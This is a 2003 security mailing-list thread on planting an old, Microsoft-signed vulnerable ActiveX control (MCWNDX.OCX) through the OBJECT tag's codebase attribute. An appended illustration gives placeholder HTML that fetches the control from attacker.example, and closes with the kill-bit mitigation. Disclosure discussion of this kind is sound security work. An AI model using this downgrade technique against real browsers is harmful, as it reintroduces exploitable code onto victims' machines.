
RE: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow



What about pointing the OBJECT tag codebase to a known, or probable, location
on the victim's own hard drive?

ActiveX never implemented any type of "same origin policy" the way JavaScript
does, so a local codebase reference should work as a technique to silently
activate any Microsoft-signed ActiveX control.

But I could be mistaken, this is commentary from memory not experimental
result.

I'd much rather spend my time conducting security audits of Linux and trying
to help those companies threatened by SCO's copyright claims defend themselves
in court.

Jason Coombs
jasonc@science.org

-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com]On Behalf Of Thor Larholm
Sent: Wednesday, August 13, 2003 8:22 AM
To: Tri Huynh; bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow


The MCWNDX.OCX binary is digitally signed by Microsoft, and as such you can
plant it on the user's machine just by pointing the codebase attribute of your
OBJECT tag to an archived copy of the file on your own server.

This also applies to other outdated ActiveX controls: even when a newer
(patched) version exists and is installed on the user's machine, you can still
re-introduce the old, buggy version, since it is digitally signed by Microsoft.


Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
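The two codebase variants discussed above (Thor's remote archived copy and Jason's local-disk reference), written out as an added example; this is not code from either poster or from Microsoft. The CLSID, the server URL and the local path are placeholders, since the thread gives none of them: a real page would carry the control's registered CLSID and a location where a signed copy of MCWNDX.OCX actually exists.

```html
<!-- Added illustration, not from the original thread. All identifiers below
     are placeholders, not real values for MCWNDX.OCX. -->
<html>
<body>

<!-- Variant 1 (Thor's point): codebase points at an archived copy of the
     control on the attacker's own server. The file still carries a valid
     Microsoft Authenticode signature, so IE's code-download path handles
     it like any other Microsoft-signed control. -->
<object id="mcwndx_remote"
        classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="http://attacker.example/archive/MCWNDX.OCX"
        width="0" height="0">
</object>

<!-- Variant 2 (Jason's suggestion, untested in the thread): codebase points
     at a known or probable location of the control on the victim's own
     disk. The path is a guess and would have to be adjusted per target. -->
<object id="mcwndx_local"
        classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="file:///C:/placeholder/path/MCWNDX.OCX"
        width="0" height="0">
</object>

</body>
</html>
```

The check a defender wants here is not "is the patched version installed", because the thread's point is that the signed old file can be brought back regardless. The control-side mitigation is the kill bit: a `Compatibility Flags` DWORD with the 0x400 bit set under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}` stops Internet Explorer from instantiating that CLSID at all, whichever signed version of the binary happens to be on disk or reachable over a codebase URL.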